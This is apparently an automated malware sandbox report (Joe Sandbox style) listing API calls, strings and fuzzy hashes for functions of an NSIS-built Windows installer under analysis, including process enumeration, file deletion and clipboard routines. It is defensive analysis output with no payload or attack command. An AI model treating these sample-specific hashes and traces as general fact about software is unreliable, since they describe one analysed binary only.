                                                                                                    • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                    • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                    • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

                                                                                                    Non-executed Functions

                                                                                                    Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                                                    • GetClientRect.USER32(?,?), ref: 00405196
                                                                                                    • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                                                      • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                                                                                    • ShowWindow.USER32(00000000), ref: 004052E7
                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                                                    • ShowWindow.USER32(00000008), ref: 00405333
                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                                                    • CreatePopupMenu.USER32 ref: 00405376
                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                                                    • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                                                    • EmptyClipboard.USER32 ref: 00405411
                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                                                    • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                                                    • CloseClipboard.USER32 ref: 0040546E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                    • String ID: @rD$New install of "%s" to "%s"${
                                                                                                    • API String ID: 2110491804-2409696222
                                                                                                    • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                                                    • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                                                    • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                                                                    • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                                                                    Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                    • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                    • String ID: $ @$M$N
                                                                                                    • API String ID: 1638840714-3479655940
                                                                                                    • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                    • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                    • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                    • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                    Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                    • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                    • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                      • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                      • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                                                                                                    • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                    • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                    • String ID: 82D$@%F$@rD$A
                                                                                                    • API String ID: 3347642858-1086125096
                                                                                                    • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                    • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                    • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                                                                    • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                    Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                    • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                    • API String ID: 1916479912-1189179171
                                                                                                    • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                    • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                    • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                    • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                    Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                    • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                                                                                                    • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                    • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                    • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                    Strings
                                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                    • \*.*, xrefs: 00406D03
                                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                    • API String ID: 2035342205-3294556389
                                                                                                    • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                                                    • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                    • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                                                                    • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                    Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                    • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                    • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                    • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                    • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                    • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                    • API String ID: 3581403547-784952888
                                                                                                    • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                    • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                    • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                    • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                    Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                    Strings
                                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateInstance
                                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                    • API String ID: 542301482-1377821865
                                                                                                    • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                    • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                    • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                    • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                    Function 00402E18 Relevance: 1.5, APIs: 1, Instructions: 27fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 1974802433-0
                                                                                                    • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                                                    • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                    • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                                                                    • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                    Function 004063AC Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                    • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                      • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                    • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2002081296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2002038831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002117315.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002174359.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2002249561.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                    • API String ID: 20674999-2124804629
                                                                                                    • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                                                                    • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                                                                    • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
